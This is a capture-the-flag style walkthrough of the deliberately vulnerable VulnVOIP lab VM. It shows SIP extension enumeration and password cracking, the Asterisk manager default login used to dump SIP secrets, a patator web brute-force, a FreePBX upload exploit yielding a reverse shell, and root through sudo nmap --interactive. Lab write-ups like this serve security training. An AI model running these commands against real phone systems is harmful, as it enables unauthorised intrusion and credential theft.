VulnVOIP Write-Up
To prepare for OSCP1 I’m planning to do a whole bunch of VulnHub VMs and other challenges. Doing these VMs and creating write-ups should give a good amount of practice before I start with the actual PWK1 course.
VulnVOIP
VulnVoIP is based on a relatively old AsteriskNOW distribution and has a number of weaknesses. The aim is to locate VoIP users, crack their passwords and gain access to the Support account voicemail.
Just to keep things interesting this particular distro also suffers from a known exploit from which it is relatively easy to gain a root shell. Once you’ve found the easy way, can you get root using a different method?
I’ve created these basic VoIP hacking training exercises as I found very limited resources online. Hopefully VulnVoIP will help others learn the basic fundamentals of VoIP hacking in a safe environment 2.
Setup
I’m using VMware with two VMs: Kali 2017.1 and VulnVOIP.
Scanning & Enumeration
When everything is set up in VMWare we can start scanning. Initially we have to figure out what the IP of the VulnVOIP system is. We can do this via our kali machine by looking at our IP there:
root@vm-kali:~/Documents/vulnhub/VulnVOIP# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:de:fe:4f brd ff:ff:ff:ff:ff:ff
inet 172.16.45.130/24 brd 172.16.45.255 scope global dynamic eth0
valid_lft 1159sec preferred_lft 1159sec
inet6 fe80::20c:29ff:fede:fe4f/64 scope link
valid_lft forever preferred_lft forever
From here on we can do a quick Nmap scan to see what other systems are active in the 172.16.45.0/24 range. We are using the -T4 option to perform a fast and aggressive scan 3:
root@vm-kali:~/Documents/vulnhub/VulnVOIP# nmap -T4 172.16.45.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-22 14:26 MDT
--snip--
Nmap scan report for 172.16.45.131
Host is up (0.000093s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
4445/tcp open upnotifyp
MAC Address: 00:0C:29:24:F1:C6 (VMware)
--snip--
Nmap done: 256 IP addresses (5 hosts up) scanned in 5.42 seconds
Looking around
Before starting more scans, we should take a quick look the results of the initial nmap scan. One of the first things that caught my eye was the HTTP server, so let’s take a look there.
When we go to the URL we can find a couple of pages that both require login credentials. They do give some possibly interesting information about software used: “FreePBX 2.5 Original work based on ARI from Littlejohn Consulting” and “FreePBX 2.7.0.0”.
More Scanning
Next we can continue with some additional scans that will target VOIP in specific. Generally you should also realise that VOIP works over UDP and therefore you should also do an UDP scan. In this case I will skip this because I went down another path that provided all the information I needed - the SIPVicious suite 4 5.
Before I started with this VM I did not know much about VOIP/SIP. So through quite a bit of research I came across a lot of information and also some interesting tools. One of these tools is the SIPVicious suite that consists of multiple applications that can help identify SIP servers, extensions and help bruteforce passwords. So let’s start with trying to identify a SIP server:
root@vm-kali:~/Documents/vulnhub/VulnVOIP# svmap 172.16.45.131
| SIP Device | User Agent | Fingerprint |
------------------------------------------------------------
| 172.16.45.131:5060 | Asterisk PBX 1.6.2.11 | disabled |
So now we know that there is an Asterisk PBX 1.6.2.11 server running. Let’s also try the svwar tool to see if we can identify any extensions:
root@vm-kali:~/Documents/vulnhub/VulnVOIP# svwar -e100-2000 -m INVITE 172.16.45.131
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
| Extension | Authentication |
------------------------------
| 201 | reqauth |
| 200 | reqauth |
| 2000 | reqauth |
| 102 | reqauth |
| 100 | weird |
| 101 | reqauth |
Nice. Just to keep going, let’s also try the svcrack tool on one of these extensions - e.g. 2000. We’ll use the rockyou word list as a dictionary for our attack:
root@vm-kali:~/Documents/vulnhub/VulnVOIP# svcrack -u2000 -d /usr/share/wordlists/rockyou.txt 172.16.45.131
ERROR:ASipOfRedWine:We got an unknown response
| Extension | Password |
---------------------------
| 2000 | password123 |
Very well. This information is great and all, and we can play around with these tools to get some results, but unfortunately I was unable to use these credentials in any of the available login screens. So it might be time to take a step back and do some more searching for vulnerabilities, default credentials or other useful information that might help us gain access.
I will not go too deep into what kind of searching I did, but these are some of the more interesting results:
- There is a manager interface 6 7;
- The manager interface has default credentials 8;
- More potential default credentials 9;
- Multiple interesting exploits via searchsploit 10 11.
There were more random things, but these results provided the information that was required for the rest of the challenge. I did find more credentials, but those did not work or did not provide any interesting information.
Manager Interface
When I was trying the credentials at the manager interface I had success with admin:amp111 8. So let’s see what kind of interesting information this interface can provide.
root@vm-kali:~/Documents/vulnhub/VulnVOIP# telnet 172.16.45.131 5038
Trying 172.16.45.131...
Connected to 172.16.45.131.
Escape character is '^]'.
Asterisk Call Manager/1.1
Action: Login
Username: admin
Secret: amp111
Response: Success
Message: Authentication accepted
Action: GetConfig
Filename: sip.conf
Response: Success
Category-000000: general
--snip--
Category-000001: 100
Line-000001-000000: deny=0.0.0.0/0.0.0.0
Line-000001-000001: secret=
--snip--
Category-000002: 101
Line-000002-000000: deny=0.0.0.0/0.0.0.0
Line-000002-000001: secret=s3cur3
L--snip--
Category-000003: 102
Line-000003-000000: deny=0.0.0.0/0.0.0.0
Line-000003-000001: secret=letmein123
--snip--
Category-000004: 200
Line-000004-000000: deny=0.0.0.0/0.0.0.0
Line-000004-000001: secret=quit3s3curE123
--snip--
Category-000005: 2000
Line-000005-000000: deny=0.0.0.0/0.0.0.0
Line-000005-000001: secret=password123
--snip--
Category-000006: 201
Line-000006-000000: deny=0.0.0.0/0.0.0.0
Line-000006-000001: secret=secret123
--snip--
Action: VoicemailUsersList
Response: Success
Message: Voicemail user list will follow
Event: VoicemailUserEntry
VMContext: default
VoiceMailbox: 2000
Fullname: Support
--snip--
NewMessageCount: 1
Event: VoicemailUserEntryComplete
So we found some more passwords for the extensions and we know that extension 2000, or user support, has one voicemail. Sadly those credentials don’t work on the current login screens… In hindsight it would have been an option to call the support extension to listen to the voice mail, but I had not tried that.
Brute force HTTP login
After trying all kinds of things in the manager I figured to also try and brute force the /recordings/ login screen with patator. I had not used it that often and wanted to try it out:
root@vm-kali:~/Documents/vulnhub/VulnVOIP# patator http_fuzz url="http://172.16.45.131/recordings/" method=POST body="username=2000&password=FILE0&btnSubmit=Submit" 0=/usr/share/wordlists/rockyou.txt follow=1 accept_cookie=1 -x ignore:fgrep="Incorrect Username or Password" -x quit:fgrep!="Incorrect Username or Password"
12:26:27 patator INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2017-07-22 12:26 MDT
12:26:28 patator INFO -
12:26:28 patator INFO - code size:clen time | candidate | num | mesg
12:26:28 patator INFO - -----------------------------------------------------------------------------
12:26:29 patator INFO - 200 11308:-1 0.254 | 000000 | 23 | HTTP/1.1 200 OK
12:26:29 patator INFO - 200 11308:-1 0.163 | purple | 33 | HTTP/1.1 200 OK
12:26:29 patator INFO - Hits/Done/Skip/Fail/Size: 2/31/0/0/14344392, Avg: 33 r/s, Time: 0h 0m 0s
12:26:29 patator INFO - To resume execution, pass --resume 2,4,4,4,4,2,1,4,4,2
That was fast… After some additional testing it seems that any password that only contains ‘0’ works - I’m not sure why tho…
When you log into the /recording/ page, you can immediately see that there is a voice mail for the support user that we can download and listen to:
Hey Mark, I think the support web access account has been compromised. I have changed the password to securesupport123, all one word and lowercase. You can log on it the usual address. See you in the morning.
Perfect! Now we can use these credentials to log into the admin area.
Exploitation
Now that we have access to the admin area we can use one of the earlier mentioned exploits to get a reverse shell 10 (The other one would be the easier option 11). For the reverse shell I used one that I found via google 12.
According to the vulnerability you can upload a malicious file via the “System Recordings” page where you can influence the location, name and extension of the uploaded file. So if you follow the explanation in the exploit you will be able to upload and access your reverse shell:
In a browser go to: 172.16.45.131/admin/shell-ivrrecording.php
root@vm-kali:~/Documents/vulnhub/VulnVOIP# nc -lvp 2222
listening on [any] 2222 ...
172.16.45.131: inverse host lookup failed: Unknown host
connect to [172.16.45.130] from (UNKNOWN) [172.16.45.131] 46208
Linux vulnvoip.localdomain 2.6.18-308.16.1.el5 #1 SMP Tue Oct 2 22:01:37 EDT 2012 i686 i686 i386 GNU/Linux
13:52:02 up 1:43, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=101(asterisk) gid=103(asterisk) groups=103(asterisk)
sh: no job control in this shell
sh-3.2$ id
uid=101(asterisk) gid=103(asterisk) groups=103(asterisk)
Privilege Escalation
Now that we have a shell we can go look for a way to gain root privileges. The first thing would be to look for applications that can be abused. The following command will look for files that will be run by the owner and not the user launching it, and it will discard errors to clean up the results:
sh-3.2$ find / -perm -u=s -type f 2>/dev/null
/lib/dbus-1/dbus-daemon-launch-helper
/usr/libexec/openssh/ssh-keysign
/usr/bin/rsh
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chage
/usr/bin/chfn
/usr/bin/rcp
/usr/bin/gpasswd
/usr/bin/sudoedit
/usr/bin/rlogin
/usr/bin/chsh
/usr/sbin/suexec
/usr/sbin/userisdnctl
/usr/sbin/usernetctl
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/kerberos/bin/ksu
/bin/umount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/umount.nfs
/sbin/mount.nfs
/sbin/umount.nfs4
/sbin/pam_timestamp_check
/sbin/mount.nfs4
/sbin/mount.ecryptfs_private
/sbin/unix_chkpwd
Another option is to list the allowed commands for the invoking user:
sh-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"
Runas and Command-specific defaults for asterisk:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /usr/bin/nmap
The Nmap version is quite old and can be used to become root via the interactive mode:
sh-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)